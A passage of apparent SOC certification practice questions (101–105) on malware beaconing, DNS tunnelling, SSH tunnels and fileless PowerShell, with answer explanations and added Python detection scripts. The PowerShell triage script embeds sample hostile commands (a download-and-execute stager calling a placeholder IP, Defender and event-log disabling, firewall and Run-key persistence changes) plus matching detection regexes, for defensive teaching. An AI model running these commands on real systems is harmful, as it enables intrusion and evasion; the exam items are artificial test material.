Option B is correct. Malware often leverages obfuscated scripts and elevated privileges to manipulate endpoint configurations, bypass security controls, and establish covert communication with external infrastructure. Disabling logging services prevents alerts from being generated, while modifying firewall rules allows outbound communication that would normally be blocked, facilitating exfiltration of sensitive data or persistent command-and-control channels. Immediate SOC response should include isolating affected endpoints to prevent further compromise and lateral movement. Memory capture is crucial for analyzing in-memory execution, as many modern threats operate without leaving artifacts on disk. Analysts should perform deep script analysis to understand malware behavior, determine persistence mechanisms, and identify external endpoints being contacted. Network traffic monitoring and correlation with threat intelligence can reveal the scope and sophistication of the attack, including identifying other potentially compromised endpoints. Remediation steps involve cleaning infected systems, restoring logging and firewall rules, updating detection signatures to recognize similar threats in the future, and continuous monitoring for signs of recurring malicious activity. Evidence preservation is essential for forensic investigations, regulatory compliance, and supporting potential legal action against the perpetrators. The key reason this approach is necessary is that sophisticated malware is designed to evade traditional detection, and failing to isolate and analyze endpoints immediately could allow attackers to maintain long-term access, compromise additional systems, and extract highly sensitive data.
Option C assumes misconfigured firewall rules. Misconfigurations may unintentionally block or allow traffic, but they rarely include obfuscation, script execution, elevated privileges, and simultaneous disabling of logging services. Treating this behavior as benign based on an assumption of misconfiguration may result in delayed detection of a highly sophisticated threat, allowing malware to remain undetected while performing reconnaissance, lateral movement, and data exfiltration. Misconfigurations do not typically execute code that attempts to bypass security mechanisms intentionally, and they are generally documented and traceable within IT change management systems.
Option D assumes user testing. Legitimate user testing is usually documented and predictable and rarely involves elevated privileges, obfuscation, or the manipulation of security controls such as logging services and firewall rules. Ignoring suspicious activity under the assumption of testing could result in undetected malware operating within the environment. Malicious actors often mimic user behavior to evade detection, and misclassifying anomalous scripts as testing could lead to extended periods of exposure, allowing attackers to perform reconnaissance, gather credentials, and exfiltrate data.
Selecting option B ensures that the SOC immediately addresses the threat by isolating affected endpoints, capturing in-memory evidence for forensic analysis, analyzing the obfuscated scripts, and understanding how the malware maintains persistence and communicates with external infrastructure. This allows the organization to contain the attack, remediate infected systems, update detection mechanisms, and prevent similar attacks in the future. It balances immediate containment with thorough forensic analysis, protecting sensitive information, maintaining network integrity, and meeting regulatory requirements. Of the four choices, only treating the activity as malware and responding accordingly provides the systematic steps required to prevent escalation, reduce risk, and strengthen the overall security posture.
Question 102
A SOC analyst identifies endpoints generating repeated HTTPS requests to newly registered domains with dynamically generated subdomains. The requests are low-volume, highly frequent, occur off-hours, and are initiated by scripts not documented in IT operations. What is the most likely threat, and what should the SOC do first?
A) Normal application telemetry; allow.
B) Malware using newly registered domains for command-and-control; capture traffic, isolate endpoints, and analyze scripts.
C) Misconfigured web services; update configuration.
D) Legitimate cloud service testing; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal telemetry. Telemetry typically involves predictable, documented domains, follows a known schedule, and produces auditable logs. Persistent low-volume HTTPS requests to newly registered domains with dynamically generated subdomains are anomalous and inconsistent with normal telemetry. Ignoring this behavior could allow malware to maintain covert command-and-control channels or exfiltrate data, remaining undetected due to low traffic volumes. Normal telemetry is usually designed to ensure endpoint and application health rather than facilitate unauthorized external communications.
Option B is correct. Malware frequently uses dynamically generated subdomains on newly registered domains to evade reputation-based blocking: a domain-generation algorithm (DGA) lets the implant and its operator agree on fresh names before any of them reach a blocklist. The off-hours timing, low-volume but highly frequent requests, and undocumented script execution all point to beaconing. Immediate SOC response should involve capturing network traffic to analyze the destinations, isolating affected endpoints to prevent further command-and-control communications, and analyzing the responsible scripts to understand the malware's operation. Because the sessions are HTTPS, the payload is encrypted; the useful fields in the capture are the TLS SNI and server certificate, the JA3 client fingerprint, the resolved IPs, and the matching DNS queries, combined with the registration date from a domain-age feed. Correlating network logs with threat intelligence can identify associated attacker infrastructure. Remediation includes cleaning infected systems, updating detection rules for dynamically generated domain patterns, monitoring other systems for similar behaviors, and preserving forensic evidence for regulatory compliance and incident analysis. Neglecting to treat this as malicious could allow persistent malware operations, lateral movement, and sensitive data exfiltration.
Option C assumes misconfigured web services. Misconfigurations are predictable, documented, and generally limited in scope. They rarely cause low-volume, persistent, off-hours HTTPS requests to unknown domains, and assuming misconfiguration could allow attackers to maintain covert access undetected. Misconfiguration alone would not explain the use of dynamically generated subdomains or scripts executing off-hours.
Option D assumes legitimate cloud service testing. Testing is scheduled, documented, and predictable, and usually communicates with known vendor domains. Observed activity is inconsistent with standard testing procedures. Ignoring this as cloud testing could result in prolonged malware activity, increasing the risk of data loss or system compromise.
Selecting option B ensures proper containment, forensic analysis, and remediation of malware infrastructure. It addresses the immediate threat, preserves evidence, and enables preventive measures to protect sensitive systems and data. Of the four possibilities, only treating this activity as malicious allows a comprehensive response that balances containment, investigation, and remediation while strengthening organizational defenses against advanced persistent threats.
Question 103
A SOC analyst observes endpoints sending repeated DNS queries to high-entropy subdomains of newly registered domains. Queries are low-volume but occur frequently outside business hours. What is the most likely threat, and what is the recommended response?
A) Normal DNS resolution; allow traffic.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Standard DNS traffic resolves known domains with predictable subdomain patterns. Persistent queries to newly registered domains with high-entropy subdomains are highly anomalous. Allowing this activity could enable covert malware communications or data exfiltration. Normal DNS operations are designed to provide legitimate name resolution and typically produce predictable query patterns that correlate with operational needs. Ignoring suspicious queries exposes the organization to persistent threats that may bypass standard monitoring.
Option B is correct. DNS tunneling encodes data in the labels of DNS queries (and in responses, often TXT or NULL records), so it passes through networks that allow DNS out while blocking other egress. Indicators include frequent off-hours queries, high-entropy dynamically generated subdomains, unusually long names, and queries targeting newly registered domains. Immediate SOC response involves capturing DNS traffic for analysis, isolating affected hosts to prevent further exfiltration, and performing endpoint forensics to identify the malicious processes responsible. Decoding the payload requires recovering the tunnel tool's encoding (commonly base32, base64 or hex) and the record types it uses; even when the content cannot be decoded, the query count and label sizes per host bound how much data left. Analysts should correlate DNS traffic with logs and threat intelligence to identify external attacker infrastructure. Remediation includes cleaning affected systems, updating detection rules for DNS tunneling, and continuous monitoring for similar patterns. Preserving forensic evidence ensures regulatory compliance and effective incident analysis. Neglecting to respond could allow attackers to maintain covert operations for extended periods, potentially compromising sensitive data.
Option C assumes misconfigured DNS servers. Misconfigurations typically generate predictable failures, not low-volume, high-frequency queries with high-entropy subdomains. Treating this as benign would leave covert malware undetected, allowing continued exfiltration or reconnaissance.
Option D assumes antivirus telemetry. Some security products do perform DNS lookups with hash-like labels, but those go to known vendor domains on a documented schedule. Off-hours high-entropy queries to newly registered domains are inconsistent with standard antivirus operations, so the discriminator is the ownership and age of the destination domain, not label entropy alone. Misclassifying this behavior risks extended compromise.
Selecting option B ensures containment, investigation, and remediation of covert malware activity while protecting sensitive data and maintaining network integrity. It balances immediate response with thorough analysis, preserving evidence and improving detection capabilities.
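The detection logic behind Questions 102 and 103 is the same: group queries by client and registrable domain, measure how random the subdomain labels are, and combine that with the domain's age and the time of day. The following is an added example, not part of the exam material or any product; the resolver log lines, client addresses, domains and registration dates are all constructed for the demonration, and a real pipeline would pull registration dates from a domain-age or passive-DNS feed and use the Public Suffix List instead of the two-label `registrable_domain` shortcut.

```python
import math
from collections import defaultdict
from datetime import datetime

# Constructed: registration dates a real pipeline would fetch from a domain-age
# or passive-DNS feed. The .net and .xyz domains are invented for this example.
REGISTRATION_DATES = {
    "microsoft.com": datetime(1991, 5, 2),
    "contoso-updates.net": datetime(2024, 3, 1),
    "qx7-telemetry.xyz": datetime(2024, 2, 27),
}

# Constructed resolver log: "<ISO timestamp> <client IP> <queried name>".
SAMPLE_LOG = """\
2024-03-05T02:13:07 10.0.0.15 a9f3kd02lmz8x1qp7.contoso-updates.net
2024-03-05T02:13:22 10.0.0.15 zz19qpl0m3v8rt6ka.contoso-updates.net
2024-03-05T02:13:38 10.0.0.15 7hq2mv0pl4kz9xa3r.contoso-updates.net
2024-03-05T02:13:53 10.0.0.15 m3xq8la0z7k2vp9h1.contoso-updates.net
2024-03-05T02:14:10 10.0.0.15 www.microsoft.com
2024-03-05T09:30:00 10.0.0.22 api.qx7-telemetry.xyz
2024-03-05T10:30:00 10.0.0.22 api.qx7-telemetry.xyz
2024-03-05T11:02:15 10.0.0.22 e7k2p9q1x4a8z0m3.microsoft.com
2024-03-05T11:05:00 10.0.0.22 mail.microsoft.com
"""


def shannon_entropy(s):
    """Bits per character: 0 for 'www', about 4 for a random base36 label."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname):
    """Last two labels. Demo shortcut: production code uses the Public Suffix List
    so names under co.uk and similar are grouped correctly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def subdomain_labels(qname, domain):
    """Everything left of the registrable domain, with the dots removed."""
    name = qname.lower().rstrip(".")
    return name[: -len(domain)].rstrip(".").replace(".", "")


def is_off_hours(ts, start_hour=8, end_hour=18):
    return ts.weekday() >= 5 or not (start_hour <= ts.hour < end_hour)


def analyze(log_text, now, young_days=30, entropy_threshold=3.5, min_queries=3):
    """Flag (client, domain) pairs that combine a young domain, high-entropy
    labels and repeated queries. Unknown-age domains are skipped, not flagged:
    enrich them first rather than deciding on entropy alone."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts_text, client, qname = parts
        ts = datetime.fromisoformat(ts_text)
        domain = registrable_domain(qname)
        groups[(client, domain)].append((ts, subdomain_labels(qname, domain)))

    findings = []
    for (client, domain), entries in groups.items():
        registered = REGISTRATION_DATES.get(domain)
        if registered is None:
            continue
        age_days = (now - registered).days
        mean_entropy = sum(shannon_entropy(sub) for _, sub in entries) / len(entries)
        off_hours = sum(is_off_hours(ts) for ts, _ in entries) / len(entries)
        if age_days <= young_days and mean_entropy >= entropy_threshold and len(entries) >= min_queries:
            findings.append({
                "client": client, "domain": domain, "queries": len(entries),
                "domain_age_days": age_days,
                "mean_label_entropy": round(mean_entropy, 2),
                "off_hours_fraction": round(off_hours, 2),
            })
    findings.sort(key=lambda f: (-f["queries"], f["client"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG, now=datetime(2024, 3, 5, 12, 0)):
        print(finding)
```

Only the 10.0.0.15 traffic to contoso-updates.net is reported: the hash-like label under microsoft.com is not, because the domain is decades old, and the repeated api.qx7-telemetry.xyz lookups are not, because the label carries almost no entropy. Tune `young_days` and `entropy_threshold` against a baseline of your own resolver logs before alerting on them; CDN and security-vendor names will push the threshold up.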
Question 104
A SOC analyst detects Linux endpoints repeatedly connecting over non-standard SSH ports to unknown external IPs. These connections occur outside business hours and are associated with unexpected processes executing in the background. What is the most likely threat, and what should the SOC do first?
A) Routine system administration; allow connections.
B) Malicious SSH tunnels for command-and-control or data exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation scripts; update configuration.
D) Monitoring software; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine system administration. Normal SSH activity is predictable, typically occurs over standard ports (port 22), and involves known internal or vendor hosts. Continuous connections to unknown external IPs over non-standard ports, executed by unexpected processes, are highly anomalous. Assuming this is legitimate could allow attackers to establish covert channels, move laterally, and exfiltrate sensitive information. System administrators generally follow documented procedures and maintain logs. Deviations from these norms, especially persistent off-hours activity, indicate potential compromise. Ignoring such behavior under the assumption of routine administration exposes the organization to extended threat persistence, where attackers can quietly collect credentials, monitor traffic, and prepare for future exploitation.
Option B is correct. Malicious SSH tunnels are often employed by attackers to bypass firewall rules, encrypt communications, and maintain command-and-control channels or exfiltrate sensitive data. Indicators include off-hours persistent connections, execution of unknown processes, non-standard ports, and communication with external IPs that have no business relevance. A non-standard port by itself is not evidence, since many organizations deliberately move SSH off port 22; the combination of unknown destination, unexpected parent process and timing is what matters, and a protocol-aware sensor (for example Zeek's ssh.log) confirms that the traffic really is SSH whatever port it uses. Immediate SOC response involves isolating the affected endpoints to prevent further compromise or lateral movement. Network traffic should be captured and analyzed to identify command-and-control infrastructure, communication patterns, and potential exfiltrated data. Endpoint forensics is critical to identify the processes responsible for the activity and understand malware functionality; on Linux, ss -tnp maps each connection to its process, and /proc/<pid>/exe together with the parent process shows where the binary runs from and what launched it. Threat intelligence can provide information about known attacker infrastructure, including IP addresses, domains, or malware signatures. Remediation includes cleaning infected endpoints, updating firewall rules to restrict unauthorized outbound traffic, applying detection rules to recognize similar SSH tunneling patterns, and monitoring other endpoints for comparable suspicious activity. Preserving forensic evidence is essential for regulatory compliance, incident reporting, and future threat hunting.
Option C assumes misconfigured automation scripts. Misconfigurations typically affect a limited scope and are predictable. They rarely result in persistent outbound SSH connections to unknown external hosts associated with unexpected processes. Treating this as benign could allow attackers to maintain covert channels undetected, enabling them to execute further attacks, exfiltrate sensitive data, or pivot to other systems. Misconfigured scripts may fail or generate error logs, making detection straightforward, unlike sophisticated malicious activity designed to blend with normal system behavior.
Option D assumes monitoring software. Legitimate monitoring tools communicate with known vendor servers over predictable ports. Persistent off-hours connections to unknown external IPs, associated with unexpected background processes, are inconsistent with normal monitoring behavior. Ignoring this activity under the assumption of monitoring could leave attackers in control of endpoints, potentially undermining the network’s security posture. Sophisticated attackers often mimic legitimate monitoring patterns to evade detection, making careful analysis essential.
Selecting option B ensures the SOC addresses the threat appropriately by combining immediate containment, forensic analysis, and remediation. Isolating endpoints prevents lateral movement and further compromise, while analyzing traffic and processes identifies malware behavior and command-and-control infrastructure. This approach balances rapid response with thorough investigation, preserves evidence, and enhances future detection and mitigation capabilities. Of the four scenarios, only treating the activity as malicious allows a structured and effective response that protects sensitive data, maintains system integrity, and strengthens organizational security posture against advanced persistent threats.
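The process-to-connection check described for Question 104 can be scripted over the output of ss -tnp. The following is an added example, not part of the exam material; the ss snapshot and the process table are constructed, the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges stand in for unknown external hosts (so the code classifies "external" with an explicit RFC 1918 list rather than ipaddress.is_private, which treats documentation ranges as private), and the allowlists of expected processes, suspicious paths and scheduler parents are site-specific assumptions.

```python
import ipaddress
import re

# Constructed `ss -tnp` snapshot from one Linux endpoint (not real output).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=900,fd=3))
ESTAB 0 0 10.0.0.15:22 10.0.0.9:55110 users:(("sshd",pid=901,fd=4))
ESTAB 0 0 10.0.0.15:41002 10.0.0.5:22 users:(("ssh",pid=2210,fd=3))
ESTAB 0 0 10.0.0.15:50112 203.0.113.250:443 users:(("curl",pid=2300,fd=4))
ESTAB 0 0 10.0.0.15:51234 203.0.113.7:2222 users:(("ssh",pid=4142,fd=3))
ESTAB 0 0 10.0.0.15:51240 198.51.100.23:8443 users:(("kworkerd",pid=4177,fd=5))
"""

# Constructed stand-in for what a collector reads from /proc/<pid>/exe and the
# parent's comm name; an EDR process table provides the same fields.
PROCESS_INFO = {
    900: {"exe": "/usr/sbin/sshd", "parent": "systemd"},
    901: {"exe": "/usr/sbin/sshd", "parent": "sshd"},
    2210: {"exe": "/usr/bin/ssh", "parent": "bash"},
    2300: {"exe": "/usr/bin/curl", "parent": "bash"},
    4142: {"exe": "/usr/bin/ssh", "parent": "cron"},
    4177: {"exe": "/dev/shm/.cache/kworkerd", "parent": "cron"},
}

# Site-specific assumptions: processes expected to hold outbound connections,
# the server side of SSH (never an outbound tunnel), paths no legitimate binary
# runs from, and parents that imply an unattended, scheduled launch.
EXPECTED_OUTBOUND = {"ssh", "curl", "wget", "apt-get"}
SERVER_PROCS = {"sshd"}
SUSPICIOUS_EXE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
SCHEDULER_PARENTS = {"cron", "atd", "systemd-run"}

# RFC 1918, loopback, link-local and IPv6 local ranges; anything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

SS_LINE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+'
    r'(?P<raddr>\S+):(?P<rport>\d+|\*)\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_ss(text):
    """Parse `ss -tnp` lines into dicts; the header and unparsable lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = SS_LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        conns.append({
            "state": d["state"],
            "laddr": d["laddr"], "lport": int(d["lport"]),
            "raddr": d["raddr"],
            "rport": int(d["rport"]) if d["rport"].isdigit() else None,
            "proc": d["proc"], "pid": int(d["pid"]),
        })
    return conns


def is_external(addr):
    """True for any IPv4/IPv6 address outside the internal ranges above."""
    ip = ipaddress.ip_address(addr.strip("[]"))
    return not any(ip in net for net in INTERNAL_NETS)


def assess(conns, process_info):
    """Return findings for established outbound connections to external hosts."""
    findings = []
    for c in conns:
        if c["state"] != "ESTAB" or c["proc"] in SERVER_PROCS:
            continue
        if not is_external(c["raddr"]):
            continue  # internal peers are a lateral-movement question, handled elsewhere
        info = process_info.get(c["pid"], {})
        reasons = []
        if c["proc"] == "ssh" and c["rport"] != 22:
            reasons.append(f"ssh client to non-standard port {c['rport']}")
        if c["proc"] not in EXPECTED_OUTBOUND:
            reasons.append(f"unexpected process {c['proc']!r} holds an outbound connection")
        if info.get("exe", "").startswith(SUSPICIOUS_EXE_PREFIXES):
            reasons.append(f"binary runs from {info['exe']}")
        if info.get("parent") in SCHEDULER_PARENTS:
            reasons.append(f"launched by {info['parent']} (unattended, scheduled)")
        if reasons:
            findings.append({"pid": c["pid"], "proc": c["proc"],
                             "peer": f"{c['raddr']}:{c['rport']}", "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in assess(parse_ss(SAMPLE_SS), PROCESS_INFO):
        print(f"pid {f['pid']} ({f['proc']}) -> {f['peer']}")
        for r in f["reasons"]:
            print("   -", r)
```

Run against the snapshot, the script reports pid 4142 (ssh to an external host on 2222, started by cron) and pid 4177 (a binary named like a kernel thread running from /dev/shm with an outbound 8443 session), while the inbound sshd session, the internal ssh hop and the curl download are left alone. Each reason is reported separately so the analyst can see which of the indicators from the explanation fired rather than a single opaque score.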
Question 105
A SOC analyst observes Windows endpoints executing obfuscated PowerShell scripts that download additional payloads from external servers, modify registry keys for persistence, and attempt to disable antivirus services. Activity occurs outside business hours, and multiple endpoints are affected. What is the most likely threat, and what is the immediate SOC response?
A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative PowerShell scripts. Legitimate administrative scripts are typically signed, predictable, documented, and executed by authorized users. Scripts that are obfuscated, download payloads from untrusted servers, modify registry keys to maintain persistence, and attempt to disable antivirus services are clearly indicative of malicious activity. Ignoring such scripts under the assumption of administrative activity could allow attackers to maintain covert access, exfiltrate sensitive information, and propagate laterally across the network. Administrative activity generally produces logs, follows predictable schedules, and is auditable, whereas the described behavior deviates from these norms, particularly given that multiple endpoints are affected off-hours.
Option B is correct. Fileless malware often utilizes PowerShell to execute directly in memory, avoiding disk-based detection mechanisms. It can establish persistence through registry modifications, disable antivirus services to prevent detection, and download additional payloads for further compromise. Immediate SOC response should involve isolating affected endpoints to prevent lateral movement and further compromise. Memory capture is critical for analyzing in-memory execution and identifying malicious code. Script analysis is necessary to understand the malware's functionality, persistence mechanisms, and command-and-control communication methods; where PowerShell Script Block Logging is enabled, event ID 4104 in the Microsoft-Windows-PowerShell/Operational log records script blocks as they execute, including code that was unpacked at run time, which shortens this step considerably. Network traffic should be monitored to identify external servers receiving data or issuing commands, while correlation with threat intelligence helps identify known malicious infrastructure. Remediation includes cleaning infected endpoints, restoring security and logging services, updating detection rules to recognize similar activity, and monitoring the network for other potentially compromised systems. Preserving forensic evidence ensures proper investigation, supports regulatory compliance, and enables post-incident threat analysis. Neglecting to respond effectively could allow persistent malware operations, extended compromise, and exfiltration of highly sensitive data.
Option C assumes misconfigured automation tasks. Misconfigurations are generally predictable, limited in scope, and documented. They rarely result in obfuscated script execution, registry modification for persistence, or antivirus service tampering. Treating this as benign could allow malware to persist undetected, bypass security controls, and compromise additional endpoints. Misconfigurations would typically result in visible errors or logs, unlike the described malicious behavior.
Option D assumes user testing. Legitimate testing is documented, scheduled, and predictable, without manipulating system security controls. Ignoring activity under the assumption of testing could leave sophisticated malware unmitigated, enabling attackers to maintain persistent access, gather credentials, and exfiltrate data. Malicious actors may mimic legitimate activity to evade detection, making careful analysis essential.
Selecting option B ensures immediate containment, forensic analysis, and remediation. Isolation prevents further compromise, memory capture identifies malware behavior, and network monitoring detects command-and-control infrastructure. This approach balances immediate response with thorough investigation, preserves forensic evidence, and strengthens future detection capabilities. Analyzing all four scenarios confirms that only treating the activity as malware provides a structured, effective response to safeguard sensitive data, protect endpoints, and maintain network integrity.
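The command-line indicators named in the explanations for Question 101 (disabling logging, modifying firewall rules) and Question 105 (obfuscation, download-and-execute, registry persistence, antivirus tampering) can be turned into a triage score over process-creation events. The following is an added example, not part of the exam material or any vendor's detection content; the events, hosts, users and the encoded stager are constructed (the stager is base64-encoded by the script itself so the example runs offline), and the indicator weights and thresholds are assumptions to be tuned against your own baseline.

```python
import base64
import re
from datetime import datetime

# Constructed sample stager. Encoded here so the example runs offline; in a real
# Security 4688 / Sysmon EID 1 event the base64 blob is what the analyst sees.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/p.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events in the shape of Sysmon EID 1 / Security 4688.
SAMPLE_EVENTS = [
    {"id": 1, "time": datetime(2024, 3, 5, 3, 0), "host": "WS-014", "user": "CORP\\svc_backup",
     "cmd": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Backup-Logs.ps1"},
    {"id": 2, "time": datetime(2024, 3, 5, 2, 41), "host": "WS-021", "user": "CORP\\jdoe",
     "cmd": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"id": 3, "time": datetime(2024, 3, 5, 2, 45), "host": "WS-021", "user": "CORP\\jdoe",
     "cmd": r'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
            r'Stop-Service -Name eventlog -Force; netsh advfirewall firewall add rule '
            r'name=upd dir=out action=allow program=C:\Users\Public\upd.exe"'},
    {"id": 4, "time": datetime(2024, 3, 5, 2, 47), "host": "WS-033", "user": "CORP\\asmith",
     "cmd": r'powershell.exe -c "Set-ItemProperty -Path '
            r"'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'upd' "
            r"-Value 'C:\Users\Public\upd.exe'; "
            "$f=('Inv'+'oke-Ex'+'pression'); & $f 'Get-Date'\""},
    {"id": 5, "time": datetime(2024, 3, 5, 14, 0), "host": "WS-014", "user": "CORP\\helpdesk",
     "cmd": 'powershell.exe -Command "Get-Process | Where-Object CPU -gt 100"'},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts
# any unambiguous prefix; the three spellings here cover what is seen in practice).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# (label, pattern, weight). Weights are assumptions: tampering with security
# controls counts more than a launch flag that admins also use.
INDICATORS = [
    ("encoded command", ENCODED_ARG, 2),
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    ("profile/policy bypass", re.compile(r"(?i)-nop(?:rofile)?\b|-e(?:xecutionpolicy|p)\s+bypass"), 1),
    ("in-memory execution (IEX)", re.compile(r"(?i)\biex\b|invoke-expression"), 3),
    ("remote download", re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"), 3),
    ("security service tampering", re.compile(r"(?i)set-mppreference\s+-disable|stop-service[^;]*windefend|sc(?:\.exe)?\s+stop\s+windefend"), 4),
    ("logging tampering", re.compile(r"(?i)stop-service[^;]*eventlog|wevtutil\s+cl\b|clear-eventlog|auditpol\s+/clear"), 4),
    ("firewall rule change", re.compile(r"(?i)netsh\s+advfirewall|new-netfirewallrule|set-netfirewallprofile"), 3),
    ("registry Run-key persistence", re.compile(r"(?i)currentversion\\run"), 3),
    ("scheduled-task persistence", re.compile(r"(?i)schtasks(?:\.exe)?\s+/create|register-scheduledtask"), 3),
    ("string-splitting obfuscation", re.compile(r"(?:'[^']{1,8}'\s*\+\s*){2,}'|\[char\]\d+"), 2),
]


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or undecodable."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def is_off_hours(ts, start_hour=8, end_hour=18):
    return ts.weekday() >= 5 or not (start_hour <= ts.hour < end_hour)


def score_command(cmd, ts):
    """Score the raw command line and, if present, the decoded encoded command.
    Each indicator counts once however many times it matches."""
    decoded = decode_encoded_command(cmd)
    hits, score = [], 0
    for label, pattern, weight in INDICATORS:
        if pattern.search(cmd) or (decoded and pattern.search(decoded)):
            hits.append(label)
            score += weight
    if is_off_hours(ts):
        hits.append("off-hours execution")
        score += 1
    return score, hits, decoded


def triage(events, malicious_at=5, review_at=2):
    results = []
    for ev in events:
        score, hits, decoded = score_command(ev["cmd"], ev["time"])
        verdict = "malicious" if score >= malicious_at else "review" if score >= review_at else "benign"
        results.append({"id": ev["id"], "host": ev["host"], "user": ev["user"],
                        "score": score, "verdict": verdict, "hits": hits, "decoded": decoded})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"event {r['id']} {r['host']} {r['user']}: {r['verdict']} ({r['score']}) {r['hits']}")
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Two details are worth noting. Event 2 only looks like a launch flag until the encoded argument is decoded; the stager inside it is what carries the IEX and DownloadString hits, so any rule that scores only the visible command line misses it. Event 4 never contains the string Invoke-Expression because it is assembled from fragments at run time, which is why the string-splitting indicator exists alongside the literal one; Script Block Logging (event 4104) would show the reassembled cmdlet. The night-time backup in event 1 lands in "review", not "malicious": off-hours execution and a bypass flag are worth a look but are not evidence on their own.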